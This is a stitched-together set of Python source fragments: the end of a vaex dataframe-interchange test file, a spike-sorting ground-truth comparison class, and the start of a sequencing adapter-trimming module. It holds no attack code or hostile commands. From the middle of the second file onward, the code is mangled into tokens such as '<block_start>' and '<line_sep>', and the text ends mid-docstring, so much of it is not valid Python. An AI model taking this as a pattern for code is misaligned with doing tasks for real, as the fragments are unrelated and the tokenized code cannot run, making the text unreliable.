    assert df2.get_column(0)._col.tolist() == df.x.tolist()
    assert df2.get_column_by_name("y")._col.tolist() == df.y.tolist()

    for col in df2.get_columns():
        assert col._col.tolist() == df[col._col.expression].tolist()

    # Selecting by position or by name must yield the same sub-frame.
    by_index = df2.select_columns((0, 2))
    by_name = df2.select_columns_by_name(("x", "z"))
    assert by_index._df[:, 0].tolist() == by_name._df[:, 0].tolist()
    assert by_index._df[:, 1].tolist() == by_name._df[:, 1].tolist()


def test_chunks(df_factory):
    df = df_factory(x=np.arange(10))
    chunk_iter = iter(df.__dataframe__().get_chunks(3))
    # 10 rows in 3 chunks -> sizes 4, 4, 2, then exhaustion.
    assert next(chunk_iter).num_rows() == 4
    assert next(chunk_iter).num_rows() == 4
    assert next(chunk_iter).num_rows() == 2
    with pytest.raises(StopIteration):
        next(chunk_iter)


def assert_buffer_equal(buffer_dtype: Tuple[_VaexBuffer, Any], vaexcol: vaex.expression.Expression):
    buf, dtype = buffer_dtype
    pytest.raises(NotImplementedError, buf.__dlpack__)
    assert buf.__dlpack_device__() == (1, None)
    assert dtype[1] == vaexcol.dtype.index_type.numpy.itemsize * 8
    if not isinstance(vaexcol.values, np.ndarray) and isinstance(vaexcol.values.type, pa.DictionaryType):
        # Dictionary-encoded arrow column: the buffer holds the index values.
        assert dtype[2] == vaexcol.index_values().dtype.numpy.str
    else:
        assert dtype[2] == vaexcol.dtype.numpy.str


def assert_column_equal(col: _VaexColumn, vaexcol: vaex.expression.Expression):
    assert col.size == vaexcol.df.count("*")
    assert col.offset == 0
    assert col.null_count == vaexcol.countmissing()
    assert_buffer_equal(col._get_data_buffer(), vaexcol)


def assert_dataframe_equal(dfo: DataFrameObject, df: vaex.dataframe.DataFrame):
    assert dfo.num_columns() == len(df.columns)
    assert dfo.num_rows() == len(df)
    assert dfo.column_names() == list(df.get_column_names())
    for name in df.get_column_names():
        assert_column_equal(dfo.get_column_by_name(name), df[name])
import pandas as pd
import numpy as np

from .basecomparison import BaseTwoSorterComparison
from .comparisontools import (do_score_labels, make_possible_match, make_best_match, make_hungarian_match,
                              do_confusion_matrix, do_count_score, compute_performance)


class GroundTruthComparison(BaseTwoSorterComparison):
    """
    Compares a sorter to a ground truth.

    This class can:
      * compute a "match" between gt_sorting and tested_sorting
      * compute optionally the score label (TP, FN, CL, FP) for each spike
      * count by unit of GT the total of each (TP, FN, CL, FP) into a
        Dataframe GroundTruthComparison.count
      * compute the confusion matrix .get_confusion_matrix()
      * compute some performance metrics with several strategies based on
        the count score by unit
      * count well detected units
      * count false positive detected units
      * count redundant units
      * count overmerged units
      * summarize all this

    Parameters
    ----------
    gt_sorting: SortingExtractor
        The first sorting for the comparison
    tested_sorting: SortingExtractor
        The second sorting for the comparison
    gt_name: str
        The name of sorter 1
    tested_name: str
        The name of sorter 2
    delta_time: float
        Number of ms to consider coincident spikes (default 0.4 ms)
    match_score: float
        Minimum agreement score to match units (default 0.5)
    chance_score: float
        Minimum agreement score for a possible match (default 0.1)
    redundant_score: float
        Agreement score above which units are redundant (default 0.2)
    overmerged_score: float
        Agreement score above which units can be overmerged (default 0.2)
    well_detected_score: float
        Agreement score above which units are well detected (default 0.8)
    exhaustive_gt: bool (default False)
        Tells if the ground truth is "exhaustive" or not, i.e. if the
        GT contains all possible units. It allows more performance measurements.
        For instance, MEArec simulated datasets have exhaustive_gt=True
    match_mode: 'hungarian', or 'best'
        Which match is used for counting: 'hungarian' or 'best match'.
    n_jobs: int
        Number of cores to use in parallel. Uses all available if -1
    compute_labels: bool
        If True, labels are computed at instantiation (default False)
    compute_misclassifications: bool
        If True, misclassifications are computed at instantiation (default False)
    verbose: bool
        If True, output is verbose

    Returns
    -------
    sorting_comparison: SortingComparison
        The SortingComparison object
    """

    def __init__(self, gt_sorting, tested_sorting, gt_name=None, tested_name=None,
                 delta_time=0.4, sampling_frequency=None, match_score=0.5, well_detected_score=0.8,
                 redundant_score=0.2, overmerged_score=0.2, chance_score=0.1, exhaustive_gt=False,
                 n_jobs=-1, match_mode='hungarian', compute_labels=False,
                 compute_misclassifications=False, verbose=False):

        if gt_name is None:
            gt_name = 'ground truth'
        if tested_name is None:
            tested_name = 'tested'
        BaseTwoSorterComparison.__init__(self, gt_sorting, tested_sorting, sorting1_name=gt_name,
                                         sorting2_name=tested_name, delta_time=delta_time,
                                         match_score=match_score,  # sampling_frequency=sampling_frequency,
                                         chance_score=chance_score, n_jobs=n_jobs,
                                         verbose=verbose)
        self.exhaustive_gt = exhaustive_gt

        self._compute_misclassifications = compute_misclassifications
        self.redundant_score = redundant_score
        self.overmerged_score = overmerged_score
        self.well_detected_score = well_detected_score

        assert match_mode in ['hungarian', 'best']
        self.match_mode = match_mode
        self._compute_labels = compute_labels

        self._do_count()

        self._labels_st1 = None
        self._labels_st2 = None
        if self._compute_labels:
            self._do_score_labels()

        # confusion matrix is computed on demand
        self._confusion_matrix = None

    def get_labels1(self, unit_id):
        """Return the spike score labels (TP/FN/CL/...) of one GT unit."""
        if self._labels_st1 is None:
            self._do_score_labels()
        if unit_id in self.sorting1.get_unit_ids():
            return self._labels_st1[unit_id]
        else:
            raise Exception("Unit_id is not a valid unit")

    def get_labels2(self, unit_id):
        """Return the spike score labels of one tested unit."""
        if self._labels_st1 is None:
            self._do_score_labels()
        if unit_id in self.sorting2.get_unit_ids():
            return self._labels_st2[unit_id]
        else:
            raise Exception("Unit_id is not a valid unit")

    def _do_matching(self):
        if self._verbose:
            print("Matching...")

        self.possible_match_12, self.possible_match_21 = make_possible_match(self.agreement_scores, self.chance_score)
        self.best_match_12, self.best_match_21 = make_best_match(self.agreement_scores, self.chance_score)
        self.hungarian_match_12, self.hungarian_match_21 = make_hungarian_match(self.agreement_scores,
                                                                                self.match_score)

    def _current_match12(self):
        """GT -> tested match selected by ``self.match_mode``
        ('hungarian' or 'best'; validated in __init__)."""
        if self.match_mode == 'hungarian':
            return self.hungarian_match_12
        else:
            return self.best_match_12

    def _do_count(self):
        """
        Do raw count into a dataframe.

        Internally uses the hungarian match or the best match.
        """
        match_12 = self._current_match12()
        self.count_score = do_count_score(self.event_counts1, self.event_counts2,
                                          match_12, self.match_event_count)

    def _do_confusion_matrix(self):
        if self._verbose:
            print("Computing confusion matrix...")
        match_12 = self._current_match12()
        self._confusion_matrix = do_confusion_matrix(self.event_counts1, self.event_counts2,
                                                     match_12, self.match_event_count)

    def get_confusion_matrix(self):
        """
        Computes the confusion matrix.

        Returns
        -------
        confusion_matrix: pandas.DataFrame
            The confusion matrix
        """
        if self._confusion_matrix is None:
            self._do_confusion_matrix()
        return self._confusion_matrix

    def _do_score_labels(self):
        assert self.match_mode == 'hungarian', \
            'Labels (TP, FP, FN) can be computed only with hungarian match'
        if self._verbose:
            print("Adding labels...")
        self._labels_st1, self._labels_st2 = do_score_labels(self.sorting1, self.sorting2,
                                                             self.delta_frames, self.hungarian_match_12,
                                                             self._compute_misclassifications)

    def get_performance(self, method='by_unit', output='pandas'):
        """
        Get performance rate with several methods:
          * 'raw_count' : just render the raw count table
          * 'by_unit' : render perf as rate unit by unit of the GT
          * 'pooled_with_average' : compute rate unit by unit and average

        Parameters
        ----------
        method: str
            'raw_count', 'by_unit', or 'pooled_with_average'
        output: str
            'pandas' or 'dict'

        Returns
        -------
        perf: pandas dataframe/series (or dict)
            dataframe/series (based on 'output') with performance entries
        """
        possibles = ('raw_count', 'by_unit', 'pooled_with_average')
        if method not in possibles:
            raise Exception("'method' can be " + ' or '.join(possibles))

        if method == 'raw_count':
            perf = self.count_score
        elif method == 'by_unit':
            perf = compute_performance(self.count_score)
        elif method == 'pooled_with_average':
            perf = self.get_performance(method='by_unit').mean(axis=0)

        if output == 'dict' and isinstance(perf, pd.Series):
            perf = perf.to_dict()

        return perf

    def print_performance(self, method='pooled_with_average'):
        """
        Print performance with the selected method.
        """
        template_txt_performance = _template_txt_performance
        if method == 'by_unit':
            perf = self.get_performance(method=method, output='pandas')
            perf = perf * 100  # report percentages
            d = {k: perf[k].tolist() for k in perf.columns}
            txt = template_txt_performance.format(method=method, **d)
            print(txt)
        elif method == 'pooled_with_average':
            perf = self.get_performance(method=method, output='pandas')
            perf = perf * 100  # report percentages
            txt = template_txt_performance.format(method=method, **perf.to_dict())
            print(txt)

    def print_summary(self, well_detected_score=None, redundant_score=None, overmerged_score=None):
        """
        Print a global performance summary that depends on the context:
          * exhaustive= True/False
          * how many gt units (one or several)

        This summary mixes several performance metrics.
        """
        txt = _template_summary_part1

        d = dict(
            num_gt=len(self.unit1_ids),
            num_tested=len(self.unit2_ids),
            num_well_detected=self.count_well_detected_units(well_detected_score),
            num_redundant=self.count_redundant_units(redundant_score),
            num_overmerged=self.count_overmerged_units(overmerged_score),
        )

        if self.exhaustive_gt:
            txt = txt + _template_summary_part2
            d['num_false_positive_units'] = self.count_false_positive_units()
            d['num_bad'] = self.count_bad_units()

        txt = txt.format(**d)

        print(txt)

    def get_well_detected_units(self, well_detected_score=None):
        """
        Return the list of "well detected units" from tested_sorting.

        "well detected units" are defined as units in tested that
        are well matched to GT units.

        Parameters
        ----------
        well_detected_score: float (default 0.8)
            The agreement score above which tested units
            are counted as "well detected".
        """
        if well_detected_score is not None:
            self.well_detected_score = well_detected_score

        matched_units2 = self.hungarian_match_12
        well_detected_ids = []
        for u2 in self.unit2_ids:
            if u2 in list(matched_units2.values):
                u1 = self.hungarian_match_21[u2]
                score = self.agreement_scores.at[u1, u2]
                if score >= self.well_detected_score:
                    well_detected_ids.append(u2)

        return well_detected_ids

    def count_well_detected_units(self, well_detected_score=None):
        """
        Count how many well detected units there are.

        kwargs are the same as get_well_detected_units.
        """
        # BUG FIX: well_detected_score previously had no default, so calling
        # this without an argument (as every sibling count_* method allows,
        # and as the docstring promises) raised a TypeError.
        return len(self.get_well_detected_units(well_detected_score=well_detected_score))

    def get_false_positive_units(self, redundant_score=None):
        """
        Return the list of "false positive units" from tested_sorting.

        "false positive units" are defined as units in tested that
        are not matched at all in GT units.

        Needs exhaustive_gt=True

        Parameters
        ----------
        redundant_score: float (default 0.2)
            The agreement score below which tested units
            are counted as "false positive" (and not "redundant").
        """
        assert self.exhaustive_gt, 'false_positive_units list is valid only if exhaustive_gt=True'

        if redundant_score is not None:
            self.redundant_score = redundant_score

        matched_units2 = list(self.hungarian_match_12.values)
        false_positive_ids = []
        for u2 in self.unit2_ids:
            if u2 not in matched_units2:
                if self.best_match_21[u2] == -1:
                    # no GT unit overlaps this tested unit at all
                    false_positive_ids.append(u2)
                else:
                    u1 = self.best_match_21[u2]
                    score = self.agreement_scores.at[u1, u2]
                    if score < self.redundant_score:
                        false_positive_ids.append(u2)

        return false_positive_ids

    def count_false_positive_units(self, redundant_score=None):
        """
        See get_false_positive_units().
        """
        return len(self.get_false_positive_units(redundant_score))

    def get_redundant_units(self, redundant_score=None):
        """
        Return the list of "redundant units".

        "redundant units" are defined as units in tested
        that match a GT unit with a big agreement score
        but are not its best match. In other words, GT units
        that are detected twice or more.

        Parameters
        ----------
        redundant_score: float (default 0.2)
            The agreement score above which tested units
            are counted as "redundant" (and not "false positive").
        """
        assert self.exhaustive_gt, 'redundant_units list is valid only if exhaustive_gt=True'

        if redundant_score is not None:
            self.redundant_score = redundant_score

        matched_units2 = list(self.hungarian_match_12.values)
        redundant_ids = []
        for u2 in self.unit2_ids:
            if u2 not in matched_units2 and self.best_match_21[u2] != -1:
                u1 = self.best_match_21[u2]
                if u2 != self.best_match_12[u1]:
                    score = self.agreement_scores.at[u1, u2]
                    if score >= self.redundant_score:
                        redundant_ids.append(u2)

        return redundant_ids

    def count_redundant_units(self, redundant_score=None):
        """
        See get_redundant_units().
        """
        return len(self.get_redundant_units(redundant_score=redundant_score))

    def get_overmerged_units(self, overmerged_score=None):
        """
        Return the list of "overmerged units".

        "overmerged units" are defined as units in tested that match
        more than one GT unit with an agreement score larger than
        overmerged_score.

        Parameters
        ----------
        overmerged_score: float (default 0.2)
            Tested units with 2 or more agreement scores above 'overmerged_score'
            are counted as "overmerged".
        """
        assert self.exhaustive_gt, 'overmerged_units list is valid only if exhaustive_gt=True'

        if overmerged_score is not None:
            self.overmerged_score = overmerged_score

        overmerged_ids = []
        for u2 in self.unit2_ids:
            scores = self.agreement_scores.loc[:, u2]
            if len(np.where(scores > self.overmerged_score)[0]) > 1:
                overmerged_ids.append(u2)

        return overmerged_ids

    def count_overmerged_units(self, overmerged_score=None):
        """
        See get_overmerged_units().
        """
        return len(self.get_overmerged_units(overmerged_score=overmerged_score))

    def get_bad_units(self):
        """
        Return the list of "bad units".

        "bad units" are defined as units in tested that are not
        in the best match list of GT units, i.e. the union of
        "false positive units" + "redundant units".

        Needs exhaustive_gt=True
        """
        assert self.exhaustive_gt, 'bad_units list is valid only if exhaustive_gt=True'
        matched_units2 = list(self.hungarian_match_12.values)
        bad_ids = []
        for u2 in self.unit2_ids:
            if u2 not in matched_units2:
                bad_ids.append(u2)
        return bad_ids

    def count_bad_units(self):
        """
        See get_bad_units().
        """
        return len(self.get_bad_units())


# useful also for GatherComparison
_template_txt_performance="""PERFORMANCE ({method})
-----------
ACCURACY: {accuracy}
RECALL: {recall}
PRECISION: {precision}
FALSE DISCOVERY RATE: {false_discovery_rate}
MISS RATE: {miss_rate}
"""<line_sep>_template_summary_part1="""SUMMARY
-------
GT num_units: {num_gt}
TESTED num_units: {num_tested}
num_well_detected: {num_well_detected}
num_redundant: {num_redundant}
num_overmerged: {num_overmerged}
"""<line_sep>_template_summary_part2="""num_false_positive_units {num_false_positive_units}
num_bad: {num_bad}
"""<def_stmt>compare_sorter_to_ground_truth *args **kwargs<block_start><return>GroundTruthComparison(*args **kwargs)<block_end>compare_sorter_to_ground_truth.__doc__=GroundTruthComparison.__doc__<line_sep> |
"""
Adapter finding and trimming classes
The ...Adapter classes are responsible for finding adapters.
The ...Match classes trim the reads.
"""<import_stmt>logging<import_from_stmt>enum IntFlag<import_from_stmt>collections defaultdict<import_from_stmt>typing Optional Tuple Sequence Dict Any List Union<import_from_stmt>abc ABC abstractmethod<import_from_stmt>.align EndSkip Aligner PrefixComparer SuffixComparer edit_environment hamming_environment<line_sep>logger=logging.getLogger()<class_stmt>InvalidCharacter(Exception)<block_start><pass><block_end># TODO remove this enum, this should be within each Adapter class
<class_stmt>Where(IntFlag)<block_start>"""
Aligner flag combinations for all adapter types.
"REFERENCE" is the adapter sequence, "QUERY" is the read sequence
"""<line_sep>BACK=EndSkip.QUERY_START|EndSkip.QUERY_STOP|EndSkip.REFERENCE_END<line_sep>FRONT=EndSkip.QUERY_START|EndSkip.QUERY_STOP|EndSkip.REFERENCE_START<line_sep>PREFIX=EndSkip.QUERY_STOP<line_sep>SUFFIX=EndSkip.QUERY_START<line_sep># Just like FRONT/BACK, but without internal matches
FRONT_NOT_INTERNAL=EndSkip.REFERENCE_START|EndSkip.QUERY_STOP<line_sep>BACK_NOT_INTERNAL=EndSkip.QUERY_START|EndSkip.REFERENCE_END<line_sep>ANYWHERE=EndSkip.SEMIGLOBAL<block_end><def_stmt>returns_defaultdict_int # We need this function to make EndStatistics picklable.
# Even a @staticmethod of EndStatistics is not sufficient
# as that is not picklable before Python 3.5.
<block_start><return>defaultdict(int)<block_end><class_stmt>EndStatistics<block_start>"""Statistics about the 5' or 3' end"""<def_stmt>__init__ self adapter:"SingleAdapter"<block_start>self.max_error_rate:float=adapter.max_error_rate<line_sep>self.sequence:str=adapter.sequence<line_sep>self.effective_length:int=adapter.effective_length<line_sep>self.has_wildcards:bool=adapter.adapter_wildcards<line_sep>self.indels:bool=adapter.indels<line_sep>self.adapter_type:str=adapter.descriptive_identifier()<line_sep>self.allows_partial_matches:bool=adapter.allows_partial_matches<line_sep># self.errors[l][e] == n iff a sequence of length l matching at e errors was removed n times
self.errors:Dict[int Dict[int int]]=defaultdict(returns_defaultdict_int)<line_sep>self.adjacent_bases={'A':0 'C':0 'G':0 'T':0 '':0}<line_sep># TODO avoid hard-coding the list of classes
self._remove_prefix=isinstance(adapter FrontAdapter)<block_end><def_stmt>__repr__ self<block_start>errors={k:dict(v)<for>k,v self.errors.items()}<line_sep><return>"EndStatistics(max_error_rate={}, errors={}, adjacent_bases={})".format(self.max_error_rate errors self.adjacent_bases )<block_end><def_stmt>__iadd__ self other:Any<block_start><if_stmt><not>isinstance(other self.__class__)<block_start><raise>ValueError("Cannot compare")<block_end><if_stmt>(self.max_error_rate<ne>other.max_error_rate<or>self.sequence<ne>other.sequence<or>self.effective_length<ne>other.effective_length<or>self.indels<ne>other.indels)<block_start><raise>RuntimeError('Incompatible EndStatistics, cannot be added')<block_end><for_stmt>base ('A' 'C' 'G' 'T' '')<block_start>self.adjacent_bases[base]<augadd>other.adjacent_bases[base]<block_end><for_stmt>length,error_dict other.errors.items()<block_start><for_stmt>errors error_dict<block_start>self.errors[length][errors]<augadd>other.errors[length][errors]<block_end><block_end><return>self<block_end>@property<def_stmt>lengths self<block_start>d={length:sum(errors.values())<for>length,errors self.errors.items()}<line_sep><return>d<block_end><def_stmt>random_match_probabilities self gc_content:float<arrow>List[float]<block_start>"""
Estimate probabilities that this adapter end matches a
random sequence. Indels are not taken into account.
Returns a list p, where p[i] is the probability that
i bases of this adapter match a random sequence with
GC content gc_content.
"""<assert_stmt>0.0<le>gc_content<le>1.0<line_sep>seq=self.sequence<line_sep># FIXME this is broken for 'anywhere' adapters
<if_stmt>self._remove_prefix<block_start>seq=seq[::-1]<block_end>allowed_bases='CGRYSKMBDHVN'<if>self.has_wildcards<else>'GC'<line_sep>p=1.<line_sep>probabilities=[p]<for_stmt>i,c enumerate(seq)<block_start><if_stmt>c<in>allowed_bases<block_start>p<augmul>gc_content/2.<block_end><else_stmt><block_start>p<augmul>(1.-gc_content)/2.<block_end>probabilities.append(p)<block_end><return>probabilities<block_end><block_end><class_stmt>AdapterStatistics(ABC)<block_start>reverse_complemented:int=0<line_sep>name:str<line_sep>adapter:"Adapter"<line_sep>@abstractmethod<def_stmt>__iadd__ self other<block_start><pass><block_end>@abstractmethod<def_stmt>end_statistics self<arrow>Tuple[Optional[EndStatistics] Optional[EndStatistics]]<block_start><pass><block_end>@abstractmethod<def_stmt>add_match self match<arrow><none><block_start><pass><block_end><block_end><class_stmt>SingleAdapterStatistics(AdapterStatistics ABC)<block_start>"""
Statistics about a 5' or 3' adapter, where we only need to keep track of sequences
removed from one "end".
"""<def_stmt>__init__ self adapter:"SingleAdapter"<block_start>self.name=adapter.name<line_sep>self.adapter=adapter<line_sep>self.end=EndStatistics(adapter)<block_end><def_stmt>__repr__ self<block_start><return>f"SingleAdapterStatistics(name={self.name}, end={self.end})"<block_end><def_stmt>__iadd__ self other:"SingleAdapterStatistics"<block_start><if_stmt><not>isinstance(other self.__class__)<block_start><raise>ValueError("Cannot iadd")<block_end>self.end<augadd>other.end<line_sep>self.reverse_complemented<augadd>other.reverse_complemented<line_sep><return>self<block_end><block_end><class_stmt>FrontAdapterStatistics(SingleAdapterStatistics)<block_start><def_stmt>add_match self match:"RemoveBeforeMatch"<block_start>self.end.errors[match.removed_sequence_length()][match.errors]<augadd>1<block_end><def_stmt>end_statistics self<arrow>Tuple[Optional[EndStatistics] Optional[EndStatistics]]<block_start><return>self.end <none><block_end><block_end><class_stmt>BackAdapterStatistics(SingleAdapterStatistics)<block_start><def_stmt>add_match self match:"RemoveAfterMatch"<block_start>adjacent_base=match.adjacent_base()<line_sep>self.end.errors[match.removed_sequence_length()][match.errors]<augadd>1<try_stmt><block_start>self.end.adjacent_bases[adjacent_base]<augadd>1<block_end><except_stmt>KeyError<block_start>self.end.adjacent_bases[""]<augadd>1<block_end><block_end><def_stmt>end_statistics self<arrow>Tuple[Optional[EndStatistics] Optional[EndStatistics]]<block_start><return><none> self.end<block_end><block_end><class_stmt>LinkedAdapterStatistics(AdapterStatistics)<block_start>"""
Statistics about sequences removed by a lined adapter.
"""<def_stmt>__init__ self adapter:"LinkedAdapter" front:"SingleAdapter" back:"SingleAdapter" <block_start>self.name=adapter.name<line_sep>self.adapter=adapter<line_sep>self.front=EndStatistics(front)<line_sep>self.back=EndStatistics(back)<line_sep>self.reverse_complemented=0<block_end><def_stmt>__repr__ self<block_start><return>f"LinkedAdapterStatistics(name={self.name}, front={self.front}, back={self.back})"<block_end><def_stmt>__iadd__ self other:"LinkedAdapterStatistics"<block_start><if_stmt><not>isinstance(other self.__class__)<block_start><raise>ValueError("Cannot iadd")<block_end>self.front<augadd>other.front<line_sep>self.back<augadd>other.back<line_sep>self.reverse_complemented<augadd>other.reverse_complemented<line_sep><return>self<block_end><def_stmt>add_match self match:"LinkedMatch"# TODO this is duplicated code
<block_start><if_stmt>match.front_match<block_start>self.front.errors[match.front_match.removed_sequence_length()][match.errors]<augadd>1<block_end><if_stmt>match.back_match<block_start>adjacent_base=match.back_match.adjacent_base()<line_sep>self.back.errors[match.back_match.removed_sequence_length()][match.errors]<augadd>1<try_stmt><block_start>self.back.adjacent_bases[adjacent_base]<augadd>1<block_end><except_stmt>KeyError<block_start>self.back.adjacent_bases[""]<augadd>1<block_end><block_end><block_end><def_stmt>end_statistics self<arrow>Tuple[Optional[EndStatistics] Optional[EndStatistics]]<block_start><return>self.front self.back<block_end><block_end><class_stmt>AnywhereAdapterStatistics(AdapterStatistics)<block_start>"""
Statistics about sequences removed by a lined adapter.
"""<def_stmt>__init__ self adapter:"AnywhereAdapter"<block_start>self.name=adapter.name<line_sep>self.adapter=adapter<line_sep>self.front=EndStatistics(adapter)<line_sep>self.back=EndStatistics(adapter)<line_sep>self.reverse_complemented=0<block_end><def_stmt>__repr__ self<block_start><return>f"AnywhereAdapterStatistics(name={self.name}, front={self.front}, back={self.back})"<block_end><def_stmt>__iadd__ self other:"AnywhereAdapterStatistics"<block_start><if_stmt><not>isinstance(other AnywhereAdapterStatistics)<block_start><raise>ValueError("Cannot add")<block_end>self.front<augadd>other.front<line_sep>self.back<augadd>other.back<line_sep>self.reverse_complemented<augadd>other.reverse_complemented<line_sep><return>self<block_end><def_stmt>add_match self match:Union["RemoveBeforeMatch" "RemoveAfterMatch"]<arrow><none># TODO contains duplicated code from the other add_match() methods
<block_start><if_stmt>isinstance(match RemoveBeforeMatch)<block_start>self.front.errors[match.removed_sequence_length()][match.errors]<augadd>1<block_end><else_stmt><block_start>adjacent_base=match.adjacent_base()<line_sep>self.back.errors[match.removed_sequence_length()][match.errors]<augadd>1<try_stmt><block_start>self.back.adjacent_bases[adjacent_base]<augadd>1<block_end><except_stmt>KeyError<block_start>self.back.adjacent_bases[""]<augadd>1<block_end><block_end><block_end><def_stmt>end_statistics self<arrow>Tuple[Optional[EndStatistics] Optional[EndStatistics]]<block_start><return>self.front self.back<block_end><block_end><class_stmt>Match(ABC)<block_start>adapter:"Adapter"<line_sep>@abstractmethod<def_stmt>remainder_interval self<arrow>Tuple[int int]<block_start><pass><block_end>@abstractmethod<def_stmt>retained_adapter_interval self<arrow>Tuple[int int]<block_start><pass><block_end>@abstractmethod<def_stmt>get_info_records self read<arrow>List[List]<block_start><pass><block_end>@abstractmethod<def_stmt>trimmed self read<block_start><pass><block_end><block_end><class_stmt>SingleMatch(Match ABC)<block_start>"""
Representation of a single adapter matched to a single string
"""<line_sep>__slots__=['astart' 'astop' 'rstart' 'rstop' 'matches' 'errors' 'adapter' 'sequence' 'length' 'adjacent_base']<def_stmt>__init__ self astart:int astop:int rstart:int rstop:int matches:int errors:int adapter:"SingleAdapter" sequence:str <block_start>self.astart:int=astart<line_sep>self.astop:int=astop<line_sep>self.rstart:int=rstart<line_sep>self.rstop:int=rstop<line_sep>self.matches:int=matches<line_sep>self.errors:int=errors<line_sep>self.adapter:SingleAdapter=adapter<line_sep>self.sequence=sequence<line_sep># Number of aligned characters in the adapter. If there are
# indels, this may be different from the number of characters
# in the read.
self.length:int=astop-astart<block_end><def_stmt>__repr__ self<block_start><return>'SingleMatch(astart={}, astop={}, rstart={}, rstop={}, matches={}, errors={})'.format(self.astart self.astop self.rstart self.rstop self.matches self.errors)<block_end><def_stmt>__eq__ self other<arrow>bool<block_start><return>(other.__class__<is>self.__class__<and>self.astart<eq>other.astart<and>self.astop<eq>other.astop<and>self.rstart<eq>other.rstart<and>self.rstop<eq>other.rstop<and>self.matches<eq>other.matches<and>self.errors<eq>other.errors<and>self.adapter<is>other.adapter<and>self.sequence<eq>other.sequence)<block_end><def_stmt>wildcards self wildcard_char:str="N"<arrow>str<block_start>"""
Return a string that contains, for each wildcard character,
the character that it matches. For example, if the adapter
ATNGNA matches ATCGTA, then the string 'CT' is returned.
If there are indels, this is not reliable as the full alignment
is not available.
"""<line_sep>wildcards=[self.sequence[self.rstart+i]<for>i range(self.length)<if>self.adapter.sequence[self.astart+i]<eq>wildcard_char<and>self.rstart+i<l>len(self.sequence)]<line_sep><return>''.join(wildcards)<block_end><def_stmt>get_info_records self read<arrow>List[List]<block_start>seq=read.sequence<line_sep>qualities=read.qualities<line_sep>info=["" self.errors self.rstart self.rstop seq[0:self.rstart] seq[self.rstart:self.rstop] seq[self.rstop:] self.adapter.name ]<if_stmt>qualities<block_start>info<augadd>[qualities[0:self.rstart] qualities[self.rstart:self.rstop] qualities[self.rstop:] ]<block_end><else_stmt><block_start>info<augadd>["" "" ""]<block_end><return>[info]<block_end>@abstractmethod<def_stmt>removed_sequence_length self<arrow>int<block_start><pass><block_end><block_end><class_stmt>RemoveBeforeMatch(SingleMatch)<block_start>"""A match that removes sequence before the match"""<def_stmt>__repr__ self<block_start><return>'RemoveBeforeMatch(astart={}, astop={}, rstart={}, rstop={}, matches={}, errors={})'.format(self.astart self.astop self.rstart self.rstop self.matches self.errors)<block_end><def_stmt>rest self<arrow>str<block_start>"""
Return the part of the read before this match if this is a
'front' (5') adapter,
return the part after the match if this is not a 'front' adapter (3').
This can be an empty string.
"""<line_sep><return>self.sequence[:self.rstart]<block_end><def_stmt>remainder_interval self<arrow>Tuple[int int]<block_start>"""
Return an interval (start, stop) that describes the part of the read that would
remain after trimming
"""<line_sep><return>self.rstop len(self.sequence)<block_end><def_stmt>retained_adapter_interval self<arrow>Tuple[int int]<block_start><return>self.rstart len(self.sequence)<block_end><def_stmt>trim_slice self# Same as remainder_interval, but as a slice() object
<block_start><return>slice(self.rstop <none>)<block_end><def_stmt>trimmed self read<block_start><return>read[self.rstop:]<block_end><def_stmt>removed_sequence_length self<arrow>int<block_start><return>self.rstop<block_end><block_end><class_stmt>RemoveAfterMatch(SingleMatch)<block_start>"""A match that removes sequence after the match"""<def_stmt>__repr__ self<block_start><return>"RemoveAfterMatch(astart={}, astop={}, rstart={}, rstop={}, matches={}, errors={})".format(self.astart self.astop self.rstart self.rstop self.matches self.errors)<block_end><def_stmt>rest self<arrow>str<block_start>"""
Return the part of the read before this match if this is a
'front' (5') adapter,
return the part after the match if this is not a 'front' adapter (3').
This can be an empty string.
"""<line_sep><return>self.sequence[self.rstop:]<block_end><def_stmt>remainder_interval self<arrow>Tuple[int int]<block_start>"""
Return an interval (start, stop) that describes the part of the read that would
remain after trimming
"""<line_sep><return>0 self.rstart<block_end><def_stmt>retained_adapter_interval self<arrow>Tuple[int int]<block_start><return>0 self.rstop<block_end><def_stmt>trim_slice self# Same as remainder_interval, but as a slice() object
<block_start><return>slice(<none> self.rstart)<block_end><def_stmt>trimmed self read<block_start><return>read[:self.rstart]<block_end><def_stmt>adjacent_base self<arrow>str<block_start><return>self.sequence[self.rstart-1:self.rstart]<block_end><def_stmt>removed_sequence_length self<arrow>int<block_start><return>len(self.sequence)-self.rstart<block_end><block_end><def_stmt>_generate_adapter_name _start=[1]<arrow>str<block_start>name=str(_start[0])<line_sep>_start[0]<augadd>1<line_sep><return>name<block_end><class_stmt>Matchable(ABC)<block_start>"""Something that has a match_to() method."""<def_stmt>__init__ self name:str *args **kwargs<block_start>self.name=name<block_end>@abstractmethod<def_stmt>enable_debug self<block_start><pass><block_end>@abstractmethod<def_stmt>match_to self sequence:str<block_start><pass><block_end><block_end><class_stmt>Adapter(Matchable ABC)<block_start>description="adapter with one component"# this is overriden in subclasses
@abstractmethod<def_stmt>spec self<arrow>str<block_start>"""Return string representation of this adapter"""<block_end>@abstractmethod<def_stmt>create_statistics self<arrow>AdapterStatistics<block_start><pass><block_end>@abstractmethod<def_stmt>descriptive_identifier self<arrow>str<block_start><pass><block_end><block_end><class_stmt>SingleAdapter(Adapter ABC)<block_start>"""
This class can find a single adapter characterized by sequence, error rate,
type etc. within reads.
where -- A Where enum value. This influences where the adapter is allowed to appear within the
read.
sequence -- The adapter sequence as string. Will be converted to uppercase.
Also, Us will be converted to Ts.
max_errors -- Maximum allowed errors (non-negative float). If the values is less than 1, this is
interpreted as a rate directly and passed to the aligner. If it is 1 or greater, the value
is converted to a rate by dividing it by the length of the sequence.
The error rate is the number of errors in the alignment divided by the length
of the part of the alignment that matches the adapter.
minimum_overlap -- Minimum length of the part of the alignment
that matches the adapter.
read_wildcards -- Whether IUPAC wildcards in the read are allowed.
adapter_wildcards -- Whether IUPAC wildcards in the adapter are
allowed.
name -- optional name of the adapter. If not provided, the name is set to a
unique number.
